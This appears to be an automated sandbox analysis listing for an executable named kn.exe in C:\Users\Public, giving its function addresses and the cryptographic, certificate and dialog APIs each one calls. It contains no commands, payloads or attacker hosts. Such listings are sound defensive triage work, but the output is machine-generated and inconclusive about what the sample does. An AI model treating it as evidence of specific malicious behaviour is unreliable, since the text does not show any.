Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,	6_2_00007FF66590EA7C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66595A9F0 strcmp,GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,#357,#357,NCryptIsAlgSupported,#360,#357,LocalAlloc,memmove,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,LocalFree,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,	6_2_00007FF66595A9F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658EE9F0 IsDlgButtonChecked,memset,SendMessageW,LocalFree,GetDlgItemTextW,GetDlgItem,GetDlgItem,EnableWindow,LocalFree,#357,#357,CertFreeCertificateContext,CertFreeCTLContext,GetDlgItem,SendMessageW,SetDlgItemTextW,MessageBoxW,GetDlgItem,SendMessageW,GetDlgItemInt,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,#357,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetDlgItemTextW,SendDlgItemMessageA,CheckDlgButton,GetDlgItem,EnableWindow,SetDlgItemInt,CheckDlgButton,SetDlgItemTextW,SetDlgItemTextW,CertFreeCTLContext,CertFreeCertificateContext,??3@YAXPEAX@Z,memset,SendMessageW,MessageBoxW,memset,CryptUIDlgViewCRLW,memset,CryptUIDlgViewCertificateW,	6_2_00007FF6658EE9F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665920A18 BCryptSetProperty,#205,#359,#357,#357,	6_2_00007FF665920A18
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665924A1C NCryptIsKeyHandle,_wcsicmp,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,	6_2_00007FF665924A1C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665904A34 CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptHashCertificate2,CryptEncodeObjectEx,GetLastError,CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,GetLastError,GetLastError,#357,LocalFree,	6_2_00007FF665904A34
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590AA00 memset,memset,#357,#357,#357,#357,CryptEncodeObjectEx,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,#359,LocalFree,LocalFree,	6_2_00007FF66590AA00
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665928940 BCryptFinishHash,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,	6_2_00007FF665928940
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66592C940 _CxxThrowException,GetLastError,_CxxThrowException,memmove,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,CryptHashData,#205,GetLastError,#357,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,	6_2_00007FF66592C940
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658AC960 LocalAlloc,CryptGetKeyIdentifierProperty,GetLastError,#357,LocalFree,LocalFree,	6_2_00007FF6658AC960
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66592099C BCryptOpenAlgorithmProvider,#205,#359,#359,	6_2_00007FF66592099C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658E29A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,	6_2_00007FF6658E29A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665952994 CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,	6_2_00007FF665952994
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665956CE0 NCryptEnumStorageProviders,#360,	6_2_00007FF665956CE0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658E4CC0 #357,lstrcmpW,CryptEnumKeyIdentifierProperties,GetLastError,#357,LocalFree,#357,#359,LocalFree,LocalFree,free,	6_2_00007FF6658E4CC0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665978CF4 GetLastError,#360,CryptGetProvParam,GetLastError,#360,#359,LocalAlloc,CryptGetProvParam,GetLastError,#357,LocalFree,CryptReleaseContext,GetLastError,LocalAlloc,CryptGetProvParam,GetLastError,#358,LocalFree,LocalFree,#357,CryptReleaseContext,LocalFree,	6_2_00007FF665978CF4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665956D2C NCryptFreeBuffer,#360,	6_2_00007FF665956D2C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665912CF8 memset,#358,#357,CryptAcquireContextW,GetLastError,#357,#357,#358,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,DeleteFileW,LocalFree,#357,#357,#359,#359,LocalFree,LocalFree,#357,#357,#357,#357,#357,#359,#359,#359,#359,LocalFree,#359,#359,#357,	6_2_00007FF665912CF8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665922CFC CryptDestroyKey,#205,GetLastError,#357,SetLastError,	6_2_00007FF665922CFC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665920D14 NCryptFinalizeKey,#205,#357,#357,	6_2_00007FF665920D14
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658E2D18 #359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,	6_2_00007FF6658E2D18
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665886C4C CryptFindOIDInfo,#357,#357,#359,CryptFindOIDInfo,#357,LocalFree,	6_2_00007FF665886C4C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665958C58 #357,LocalAlloc,#357,memmove,memset,BCryptFreeBuffer,#357,#357,#360,#359,#359,#359,LocalAlloc,memmove,LocalAlloc,memmove,#357,#357,CryptGetDefaultProviderW,LocalAlloc,CryptGetDefaultProviderW,GetLastError,#357,#357,#357,LocalFree,LocalFree,	6_2_00007FF665958C58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665920C3C NCryptExportKey,#205,#359,#359,#357,	6_2_00007FF665920C3C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665914CA0 CryptAcquireCertificatePrivateKey,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CryptGetUserKey,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,	6_2_00007FF665914CA0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66592ACAC CryptContextAddRef,CryptDuplicateKey,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,??3@YAXPEAX@Z,	6_2_00007FF66592ACAC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665922C80 CryptDestroyHash,#205,GetLastError,#357,SetLastError,	6_2_00007FF665922C80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665964C80 CryptAcquireContextW,GetLastError,#357,CryptGenRandom,GetLastError,CryptGenRandom,GetLastError,memset,CryptReleaseContext,	6_2_00007FF665964C80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665956C88 NCryptEnumAlgorithms,#360,	6_2_00007FF665956C88
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665950BF4 CryptDuplicateHash,GetLastError,#357,CryptGetHashParam,GetLastError,#203,CryptDestroyHash,	6_2_00007FF665950BF4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665922BC0 CryptCreateHash,#205,GetLastError,#357,#357,#357,SetLastError,	6_2_00007FF665922BC0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665956C30 NCryptOpenStorageProvider,#360,	6_2_00007FF665956C30
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658BCC24 CryptDecodeObjectEx,#359,BCryptSetProperty,BCryptGetProperty,#357,BCryptDestroyKey,BCryptCloseAlgorithmProvider,	6_2_00007FF6658BCC24
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66598EB38 CryptDecodeObjectEx,GetLastError,??3@YAXPEAX@Z,LocalFree,	6_2_00007FF66598EB38
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665950B9C CryptHashData,GetLastError,#357,	6_2_00007FF665950B9C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66594CBB4 CryptGetProvParam,GetLastError,#358,LocalAlloc,#357,CryptGetProvParam,GetLastError,#357,LocalFree,	6_2_00007FF66594CBB4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665920B80 NCryptCreatePersistedKey,#205,#359,#359,#357,	6_2_00007FF665920B80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658ACB98 NCryptIsKeyHandle,GetLastError,#358,#360,NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#359,LocalFree,NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,CryptGetKeyParam,GetLastError,#359,CryptDestroyKey,NCryptIsKeyHandle,#359,NCryptIsKeyHandle,	6_2_00007FF6658ACB98
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590F6D8 #357,CryptDuplicateKey,GetLastError,CryptEncrypt,GetLastError,LocalAlloc,memmove,CryptEncrypt,GetLastError,LocalAlloc,CryptDestroyKey,LocalFree,	6_2_00007FF66590F6D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659236E8 CryptSetHashParam,#205,GetLastError,#357,#357,#357,SetLastError,	6_2_00007FF6659236E8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590B664 I_CryptFindLruEntry,I_CryptGetLruEntryData,I_CryptReleaseLruEntry,	6_2_00007FF66590B664
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658F366C CryptVerifyCertificateSignature,GetLastError,CryptVerifyCertificateSignatureEx,GetLastError,#357,	6_2_00007FF6658F366C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66591F644 NCryptDeleteKey,#205,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,	6_2_00007FF66591F644
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658AD660 GetDesktopWindow,LocalFree,#357,CertDuplicateCertificateContext,GetLastError,#357,#357,#357,#357,#357,#207,LocalFree,#358,#357,#358,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,	6_2_00007FF6658AD660
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665895664 #256,#357,CryptHashCertificate2,GetLastError,#254,#254,#357,#207,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,#359,	6_2_00007FF665895664
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66594F650 CryptHashCertificate2,SetLastError,	6_2_00007FF66594F650
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665923654 CryptReleaseContext,#205,GetLastError,#357,#357,SetLastError,	6_2_00007FF665923654
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66593D6A0 CertOpenStore,GetLastError,#357,CryptMsgOpenToDecode,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,#357,LocalFree,LocalAlloc,#357,memmove,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgClose,CertCloseStore,LocalFree,LocalFree,	6_2_00007FF66593D6A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658D76B0 #359,CryptAcquireCertificatePrivateKey,GetLastError,#357,#358,#359,#358,#358,LocalFree,LocalFree,#357,CryptFindCertificateKeyProvInfo,GetLastError,#357,LocalFree,LocalFree,CryptReleaseContext,	6_2_00007FF6658D76B0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665949688 CryptFindOIDInfo,#357,#360,#360,#360,	6_2_00007FF665949688
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658AD5C2 CertCloseStore,CryptMsgClose,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6658AD5C2
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658E55F0 #357,#360,GetLastError,#360,#359,NCryptDeleteKey,#360,#357,LocalFree,LocalFree,	6_2_00007FF6658E55F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658AF630 CryptAcquireContextW,GetLastError,#357,SetLastError,	6_2_00007FF6658AF630
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659095FC BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,CertGetCRLContextProperty,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,BCryptCloseAlgorithmProvider,	6_2_00007FF6659095FC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66594F570 CryptHashCertificate,SetLastError,	6_2_00007FF66594F570
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658EB55C CertFreeCertificateContext,CertCreateCertificateContext,GetLastError,CertDuplicateCertificateContext,#357,#358,CertCompareCertificateName,CryptVerifyCertificateSignatureEx,GetLastError,#357,#357,CertFreeCertificateContext,CertVerifyTimeValidity,#357,	6_2_00007FF6658EB55C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665959580 memset,#357,CryptCreateHash,GetLastError,#357,CryptGenRandom,GetLastError,CryptHashData,GetLastError,CryptSignHashW,GetLastError,LocalAlloc,CryptSignHashW,GetLastError,CryptImportPublicKeyInfo,GetLastError,CryptVerifySignatureW,GetLastError,#357,CryptDestroyHash,CryptDestroyKey,LocalFree,CryptReleaseContext,	6_2_00007FF665959580
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665923590 CryptImportPublicKeyInfoEx2,#205,GetLastError,#357,#357,#357,SetLastError,	6_2_00007FF665923590
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658F18DC CertFindExtension,CryptDecodeObject,GetLastError,#357,	6_2_00007FF6658F18DC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590B8D0 I_CryptGetLruEntryData,#357,	6_2_00007FF66590B8D0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66594F918 CryptEncrypt,GetLastError,LocalFree,LocalAlloc,#357,LocalFree,	6_2_00007FF66594F918
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66592391C CryptVerifySignatureW,#205,GetLastError,#357,#359,#357,SetLastError,	6_2_00007FF66592391C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658938FC RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,	6_2_00007FF6658938FC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658A3918 #357,#357,#357,#357,CertFindExtension,CryptDecodeObject,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6658A3918
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665923860 CryptSetProvParam,#205,GetLastError,#357,#357,#357,SetLastError,	6_2_00007FF665923860
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66591184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,	6_2_00007FF66591184C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590D850 #357,Sleep,BCryptCloseAlgorithmProvider,I_CryptFreeLruCache,	6_2_00007FF66590D850
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658B7884 GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,	6_2_00007FF6658B7884
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658F9878 strcmp,strcmp,strcmp,#357,#357,CompareFileTime,LocalFree,CryptMsgClose,CertCloseStore,CompareFileTime,#357,#357,	6_2_00007FF6658F9878
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659598B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,	6_2_00007FF6659598B0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658C17D4 #357,#359,#357,NCryptFinalizeKey,#360,#359,#359,#357,NCryptDeleteKey,#360,#359,#359,#359,LocalFree,LocalFree,	6_2_00007FF6658C17D4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659397E4 LoadCursorW,SetCursor,#210,LoadCursorW,SetCursor,#357,EnableWindow,SetWindowLongPtrW,SetWindowLongPtrW,SetWindowLongPtrW,GetDlgItem,SetWindowTextW,GetDlgItem,ShowWindow,CryptUIDlgFreeCAContext,LocalFree,	6_2_00007FF6659397E4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658BF810 #223,CryptDecodeObjectEx,GetLastError,CertFindAttribute,CertFindAttribute,GetLastError,#357,LocalFree,LocalFree,	6_2_00007FF6658BF810
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66594F7FC CryptExportKey,GetLastError,#357,LocalAlloc,CryptExportKey,GetLastError,LocalFree,	6_2_00007FF66594F7FC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590B808 I_CryptFindLruEntry,I_CryptGetLruEntryData,#357,I_CryptReleaseLruEntry,	6_2_00007FF66590B808
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665925768 NCryptIsKeyHandle,??_V@YAXPEAX@Z,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,	6_2_00007FF665925768
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658EF774 CertFindExtension,#357,CryptVerifyCertificateSignature,GetLastError,GetLastError,memmove,LocalFree,	6_2_00007FF6658EF774
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66594D750 LocalAlloc,CryptFormatObject,GetLastError,#358,#358,LocalFree,#357,	6_2_00007FF66594D750
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658BD790 SslEnumProtocolProviders,#357,SslOpenProvider,SslFreeBuffer,SslFreeObject,SslFreeBuffer,#359,LocalAlloc,BCryptGetProperty,CryptFindOIDInfo,BCryptDestroyKey,BCryptDestroyKey,LocalFree,	6_2_00007FF6658BD790
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66589B788 #140,iswdigit,CryptDecodeObject,GetLastError,#357,#357,#224,	6_2_00007FF66589B788
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659237A4 CryptSetKeyParam,#205,GetLastError,#357,#357,#357,SetLastError,	6_2_00007FF6659237A4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658F577C #360,#358,CryptDecodeObject,GetLastError,#357,	6_2_00007FF6658F577C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66593B794 CryptExportPublicKeyInfoEx,SetLastError,	6_2_00007FF66593B794
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659032D0 #359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,	6_2_00007FF6659032D0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658E92C4 memset,CryptHashCertificate,GetLastError,CryptHashCertificate,GetLastError,GetLastError,GetLastError,#357,#254,LocalAlloc,wcsstr,LocalAlloc,LocalAlloc,#357,memmove,GetLastError,GetProcAddress,GetLastError,GetLastError,#359,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FreeLibrary,	6_2_00007FF6658E92C4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66591F2F0 BCryptCreateHash,#205,#357,#357,#357,#357,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,	6_2_00007FF66591F2F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658F92D8 CertEnumCertificatesInStore,CertGetCRLContextProperty,CertSetCTLContextProperty,GetLastError,#357,#357,CertEnumCertificatesInStore,CryptMsgControl,GetLastError,#357,CryptMsgGetAndVerifySigner,GetLastError,#357,CryptMsgGetAndVerifySigner,#357,CertFreeCertificateContext,CertGetCRLContextProperty,CertEnumCertificatesInStore,#357,#357,#207,LocalFree,#357,#357,CertFreeCertificateContext,CompareFileTime,CertFreeCertificateContext,	6_2_00007FF6658F92D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658BD304 #357,CryptFindOIDInfo,#359,LocalAlloc,CryptEncodeObjectEx,GetLastError,LocalFree,LocalFree,LocalFree,	6_2_00007FF6658BD304
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658BB324 CryptDecodeObject,GetLastError,#357,#357,LocalFree,	6_2_00007FF6658BB324
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590D30C BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,	6_2_00007FF66590D30C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658BD240 #357,CryptFindOIDInfo,#357,LocalFree,	6_2_00007FF6658BD240
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659232A8 CryptGetProvParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,	6_2_00007FF6659232A8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658EB2B4 #357,CryptHashCertificate,GetLastError,#357,memcmp,#358,	6_2_00007FF6658EB2B4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66594D28C CryptFindOIDInfo,CryptEnumOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,#358,	6_2_00007FF66594D28C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665957290 NCryptIsKeyHandle,#359,#360,#357,#358,	6_2_00007FF665957290
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659231C0 CryptGetKeyParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,	6_2_00007FF6659231C0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659211C8 NCryptVerifySignature,#205,#357,#357,#357,#357,	6_2_00007FF6659211C8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659571C8 BCryptDestroyKey,#360,	6_2_00007FF6659571C8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665979208 #357,NCryptEnumKeys,#360,#358,	6_2_00007FF665979208
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665957214 NCryptIsKeyHandle,#357,CryptReleaseContext,GetLastError,	6_2_00007FF665957214
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590F168 CryptDuplicateKey,GetLastError,#357,CryptEncrypt,GetLastError,CryptEncrypt,GetLastError,CryptDestroyKey,	6_2_00007FF66590F168
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665905164 GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,	6_2_00007FF665905164
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665903188 CryptAcquireContextW,GetLastError,#359,#359,CryptAcquireContextW,GetLastError,	6_2_00007FF665903188
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665957178 BCryptCloseAlgorithmProvider,#360,	6_2_00007FF665957178
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658F51A4 #360,#357,#359,#207,CryptFindOIDInfo,#357,GetLastError,#357,#207,#360,#254,#358,LocalFree,LocalFree,LocalFree,	6_2_00007FF6658F51A4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66593B4EC CryptDecodeObjectEx,SetLastError,	6_2_00007FF66593B4EC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659514F0 GetEnvironmentVariableW,#205,#205,#203,CryptDestroyHash,CryptReleaseContext,CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptReleaseContext,GetLastError,#357,#357,#203,#357,#357,#357,#357,#203,LocalFree,#203,#357,#357,#207,#203,#203,LocalFree,#203,#203,CryptDestroyHash,CryptReleaseContext,	6_2_00007FF6659514F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658E3504 CreateFileW,GetLastError,#357,GetFileSize,GetLastError,#357,SetFilePointer,GetLastError,#357,CertFreeCertificateContext,CertFreeCertificateContext,CryptDestroyKey,CryptReleaseContext,CloseHandle,	6_2_00007FF6658E3504
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659234F8 CryptImportPublicKeyInfo,#205,GetLastError,#357,#357,SetLastError,	6_2_00007FF6659234F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66593B464 CryptEncodeObjectEx,SetLastError,	6_2_00007FF66593B464
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665885438 memset,#246,#357,#357,GetLastError,#357,CertFindExtension,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,	6_2_00007FF665885438
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66594F4A0 CryptHashPublicKeyInfo,SetLastError,	6_2_00007FF66594F4A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665929480 memmove,BCryptDecrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,memmove,BCryptEncrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,	6_2_00007FF665929480
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590F488 #357,LocalAlloc,memmove,CryptDuplicateKey,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,LocalFree,	6_2_00007FF66590F488
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,	6_2_00007FF66590B3D8
